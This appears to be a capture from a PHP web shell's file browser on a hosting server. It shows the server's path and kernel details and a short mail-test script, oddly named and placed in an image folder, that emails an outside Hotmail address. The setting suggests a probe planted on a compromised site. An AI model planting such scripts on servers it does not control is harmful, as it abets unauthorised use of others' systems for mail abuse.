| Current Path : /home/baheco/public_html/img/ |
Linux sd-1582531-l.dattaweb.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 |
| Current File : /home/baheco/public_html/img/mkskes.php |
<?php
ini_set( 'display_errors', 1 );
error_reporting( E_ALL );
$from = "info@microrelats.com";
$to = "pikosfitrix@hotmail.com";
$subject = "PHP Mail Test script";
$message = "This is a test to check the PHP Mail functionality";
$headers = "From:" . $from;
mail($to,$subject,$message, $headers);
echo "Test email sent";
?>